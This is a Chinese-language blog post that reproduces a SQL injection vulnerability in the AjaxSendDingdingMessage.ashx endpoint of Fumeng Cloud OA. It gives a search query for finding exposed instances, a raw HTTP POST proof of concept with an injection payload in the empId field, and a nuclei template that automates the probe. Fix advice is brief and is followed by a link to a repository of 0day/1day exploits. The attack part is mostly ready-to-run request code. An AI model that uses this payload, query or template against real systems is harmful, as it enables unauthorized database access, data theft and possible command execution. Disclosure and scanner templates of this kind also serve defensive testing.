当前位置: 首页 > article >正文

【漏洞复现】孚盟云oa AjaxSendDingdingMessage接口 存在sql注入漏洞


》》》产品描述《《《

        孚盟与阿里强强联手将最受青睐的经典C系列产品打造成全新的孚盟云产品,让用户可以用云模式实现信息化管理,让用户的异地办公更加流畅,大大降低中小企业在信息化上成本,用最小的投入享受大型企业级别的信息化服务,使中小企业在网络硬件环境、内部贸易过程管理与快速通关形成一套完整解决方案。


》》》漏洞描述《《《

   Web程序中对于用户提交的参数未做过滤直接拼接到SQL语句中执行,导致参数中的特殊字符破坏了SQL语句原有逻辑,攻击者可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。


》》》搜索语句《《《

body="hidLicResult" && body="hidProductID"


》》》漏洞复现《《《

POC

POST /m/Dingding/Ajax/AjaxSendDingdingMessage.ashx HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
X-Requested-With: XMLHttpRequest
Content-Length: 51

action=SendDingMeg_Mail&empId=2'+and+1=@@VERSION--+

yaml

id: 孚盟云oa AjaxSendDingdingMessage sql注入漏洞

info:
  name: Potential SQL Injection in Dingding Message Endpoint
  author: Kelichen
  severity: high
  description: |
    Potential SQL Injection vulnerability in the Dingding Message Endpoint.
    This template attempts to exploit the vulnerability by injecting a SQL payload.
  reference:
    - 

http:
  - raw:
      - |
        POST /m/Dingding/Ajax/AjaxSendDingdingMessage.ashx HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate, br
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
        X-Requested-With: XMLHttpRequest
        Content-Length: 51

        action=SendDingMeg_Mail&empId=2'+and+1=@@VERSION--+

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "Microsoft SQL Server"
          - "MySQL"
          - "PostgreSQL"
          - "Oracle"
        part: body

》》》修复建议《《《

如非必要,禁止公网访问该系统

通过防火墙等安全设备设置访问策略,设置白名单访问。

升级产品到最新版本


-------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------

更多最新0day/1day POC&EXP移步----->Kelichen1113/POC-EXP (github.com)

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------


http://www.kler.cn/news/328047.html

相关文章:

  • 云计算 Cloud Computing
  • 前端——DOM与BOM总结
  • macOS开发环境配置与应用
  • vant 数据校验
  • 华为OD机试 - 最长回文字符串 - 贪心算法(Python/JS/C/C++ 2024 E卷 100分)
  • ZYNQ: GPIO 之 MIO 控制 LED 实验
  • Qt(9.28)
  • 深入理解 `strtok()` 函数:字符串分割的艺术
  • go语言 常用的web框架
  • Ansible学习之ansible-pull命令
  • LLaMA: 开源大语言模型的革新者
  • react是一种语言?
  • PHP中的PEAR是什么
  • Metasploit渗透测试之服务端漏洞利用
  • 【基于spring-cloud-gateway实现自己的网关过滤器】
  • 通过 IPv6 进行远程 ADB 调试
  • 《RabbitMQ篇》基本概念介绍
  • 用于多模态MRI重建的具有空间对齐的深度展开网络|文献速递--基于多模态-半监督深度学习的病理学诊断与病灶分割
  • 基于C++和Python的进程线程CPU使用率监控工具
  • 【Linux 报错】“make: ‘xxxx‘ is up to date.” 解决办法
  • 红米k60至尊版工程固件 MTK芯片 资源预览 刷写说明 与nv损坏修复去除电阻图示
  • 第四届高性能计算与通信工程国际学术会议(HPCCE 2024)
  • 工程安全监测分析模型与智能算法模型方案
  • Shp2pb:Shapefile转Protocol Buffers的高效工具
  • 深度学习:DCGAN
  • 微信小程序——婚礼邀请函
  • 仪器数码管数字识别系统源码分享
  • 如何查看Linux系统类型
  • 当微服务中调度返回大数据量时如何处理
  • IP和功能變數名稱的基礎知識-okeyproxy